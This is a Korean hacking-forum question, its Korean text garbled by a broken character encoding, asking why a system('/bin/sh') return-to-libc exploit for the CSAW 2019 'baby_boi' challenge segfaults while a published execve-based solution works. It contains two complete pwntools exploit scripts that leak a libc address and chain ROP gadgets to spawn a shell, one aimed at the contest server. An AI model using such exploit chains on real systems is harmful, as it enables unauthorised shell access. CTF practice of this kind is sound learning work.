http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1978 [º¹»ç]
À̹ø CSAW 2019¿¡¼ baby_boi ¹®Á¦¸¦ Ǫ´Âµ¥ Àú´Â system("/bin/sh")À¸·Î ½©À» ½ÇÇà½ÃÅ°·Á°í Çϴµ¥ °è¼Ó ¼¼±×¸ÕÆ® ÆúÆ® ¿À·ù°¡ ¶¹½À´Ï´Ù. core ÆÄÀÏ µð¹ö±ë Çغôµ¥ ¶óÀ̺귯¸® ¾È¿¡¼ °è¼Ó Á¢±ÙÇÒ ¼ö ¾ø´Â ÁÖ¼Ò¶ó°í ³ª¿À³×¿ä. °á±¹ ¹®Á¦¸¦ Ç®Áö ¸øÇÏ°í ´ëȸ°¡ ³¡³ ÈÄ Ç®À̸¦ º¸´Âµ¥ ´Ùµé system("/bin/sh")°¡ ¾Æ´Ï¶ó execve("/bin/sh",0,0)À¸·Î ret ÇÏ´õ±º¿ä.
´Ù¸¥ »ç¶÷µéÀÌ »ç¿ëÇÑ Àͽº Äڵ忡¼ execve()¸¦ system()À¸·Î ¹Ù…f´Âµ¥ ¼¼±×¸ÕÆ® ÆúÆ®°¡ ¶ß°í...(´ç¿¬È÷ ÁÖ¼Òµµ ±¸Çؼ ¹Ù²ãÁá½À´Ï´Ù.)
execve()·Î ÇÏ¸é ¼º°øÇÏ°í... Ȥ½Ã ÀÌ µÎ ÇÔ¼öÀÇ Â÷ÀÌ°¡ ÀÖ³ª¿ä?
¾Æ·¡´Â Á¦°¡ »ç¿ëÇÑ Àͽº ÄÚµåÀÔ´Ï´Ù.
======== exp.py ==========
from pwn import *
p = process('./baby_boi')
printf_offset = 0x64e80
system_offset = 0x4f440
pop_rdi = 0x400793
data = p.recv()
data = data.split("\n")[1]
print 'first split = ', data
data = data.split(" ")[3]
print 'second split = ', data
log.info('\t === GADGET ===')
printf_addr = int(data, 16)
libc_base = printf_addr - printf_offset
system_addr = libc_base + system_offset
binsh_addr = system_addr + 0x164a5a
log.info('libc_base = 0x%08x'%libc_base)
log.info('printf_addr = 0x%08x'%printf_addr)
log.info('system_addr = 0x%08x'%system_addr)
log.info('pop_rdi = 0x%08x'%pop_rdi)
payload = ""
payload += "A"*40
payload += p64(pop_rdi)
payload += p64(binsh_addr)
payload += p64(system_addr)
log.info('\t === EXPLOIT START ===')
p.sendline(payload)
p.interactive()
==========================
¾Æ·¡´Â ´Ù¸¥»ç¶÷ÀÇ Ç®ÀÌ ÄÚµåÀÔ´Ï´Ù.
Ãâó : https://github.com/KEERRO/ctf-writeups/tree/master/CSAW%20CTF'19%20QUALS/BABY%20BOI
========= solve.py ===========
from pwn import *
env = {"LD_PRELOAD":"./libc-2.27.so"}
#p = process("./baby_boi",env=env)
p = remote("pwn.chal.csaw.io",1005)
data = p.recv()
data = data.split("\n")[1]
data = data.split(" ")[3]
printf_libc = int(data,16)
base = printf_libc - 0x0000000000064e80
execve = base + 0x00000000000e4e30
binsh = execve + 0xcf06a
print "base: ",hex(base)
print "execve_libc: ",hex(execve)
print "binsh: ",hex(binsh)
pop_rdi = 0x0000000000400793
paylaod = ""
paylaod += "A"*40
paylaod += p64(0x0000000000400791)
paylaod += p64(0)
paylaod += p64(0)
paylaod += p64(pop_rdi)
paylaod += p64(binsh)
paylaod += p64(execve)
p.sendline(paylaod)
p.interactive()
========================== |
Hit : 2388 Date : 2019/09/16 04:56
|